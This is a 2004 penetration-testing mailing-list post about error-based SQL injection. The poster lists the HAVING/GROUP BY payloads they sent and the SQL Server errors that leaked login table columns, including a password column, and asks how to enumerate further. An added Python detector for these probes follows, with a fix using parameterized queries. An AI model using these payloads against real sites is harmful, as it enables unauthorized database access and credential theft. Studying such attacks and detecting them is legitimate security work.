Penetration Testing mailing list archives
Re: Hacme Bank
From: KrK <krk41 () yahoo com>
Date: Fri, 17 Sep 2004 05:37:53 -0700 (PDT)
Hi List,

I have been doing testing of a web site and have found all the errors as detailed in the advanced SQL injection paper by ngsoftware and in Hacme Bank. I have been stuck on the way because of a different error and am unable to enumerate the database further. Here is the list of tests that I have done and the corresponding output. If anyone could suggest how to enumerate the rest of the table fields, it would be great.

step 1: userid='%20having%201%3d1%2d%2d (encoded form of ' having 1=1--)
result 1: Column 'logindetls.userid' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

step 2:'%20GROUP%20BY%20logindetls.userid%20having%201=1--
result 2: Column 'logindetls.password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

step 3:userid='%20GROUP%20BY%20logindetls.userid,logindetls.password%20having%201=1--
result 3: Column 'logindetls.name' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

And so on and so forth until I reach a point where I get this error:

[Microsoft][ODBC SQL Server Driver][SQL Server]:the text, ntext, and image data types cannot be compared or sorted, except when using IS NULL or LIKE operator

The application, I feel, stores text data in one of the fields, which results in the generation of this error. Has anyone in the list come across this? Any clues on how to enumerate the database further?

Thanking you,
Krk

" DON'T WORRY BE HAPPY, EVERY NIGHT YOU HAVE SOME TROUBLE, IF YOU WORRY YOU MAKE IT DOUBLE, SO DON'T WORRY BE HAPPY NOW...."
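Seen from the defending side, the request sequence in the message above leaves a recognisable trail in web server logs. The following is an added example, not part of the original post: it flags the quoted HAVING/GROUP BY probes and notices when the GROUP BY list grows from one request to the next. The /login.asp and /search.asp paths, the pwd parameter and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample requests (path and query as an access log would record them).
# The three probing payloads are the ones quoted in the message; paths are assumed.
SAMPLE_REQUESTS = [
    "/login.asp?userid=alice&pwd=x",
    "/login.asp?userid='%20having%201%3d1%2d%2d",
    "/login.asp?userid='%20GROUP%20BY%20logindetls.userid%20having%201=1--",
    "/login.asp?userid='%20GROUP%20BY%20logindetls.userid,"
    "logindetls.password%20having%201=1--",
    "/search.asp?q=group%20by%20having%20fun",  # benign text, must not be flagged
]

# A quote that closes the string literal, an optional GROUP BY column list,
# then HAVING <n>=<n> followed by a comment marker.
HAVING_PROBE = re.compile(
    r"'\s*(?:group\s+by\s+(?P<cols>[\w.,\s]+?)\s+)?"
    r"having\s+(?P<n>\d+)\s*=\s*(?P=n)\s*--",
    re.IGNORECASE,
)

def find_probes(request_uri):
    """Return (parameter, [columns already in GROUP BY]) for each probing parameter."""
    hits = []
    for name, value in parse_qsl(urlsplit(request_uri).query):
        m = HAVING_PROBE.search(value)  # value is already URL-decoded
        if m:
            cols = [c.strip() for c in (m.group("cols") or "").split(",") if c.strip()]
            hits.append((name, cols))
    return hits

def enumeration_in_progress(requests):
    """True when successive probes carry a strictly growing GROUP BY list,
    meaning each error message is leaking one more column name."""
    sizes = [len(cols) for r in requests for _, cols in find_probes(r)]
    return len(sizes) >= 2 and all(b > a for a, b in zip(sizes, sizes[1:]))

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        for param, cols in find_probes(req):
            print(f"probe in {param!r}, columns already leaked: {cols}")
    print("enumeration in progress:", enumeration_in_progress(SAMPLE_REQUESTS))
```

Detection of this kind only reports the activity. The fix is in the application: bind userid as a query parameter and return a generic error page instead of the ODBC driver message.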
Current thread:
- Hacme Bank Mark Curphey (Sep 08)
- Re: Hacme Bank Rush Molekilla (Sep 09)
- Re: Problem with Hacme Bank Install Martin Mkrtchian (Sep 09)
- <Possible follow-ups>
- RE: Hacme Bank Jeremy Junginger (Sep 09)
- RE: Hacme Bank Mark Curphey (Sep 11)
- Re: Hacme Bank KrK (Sep 17)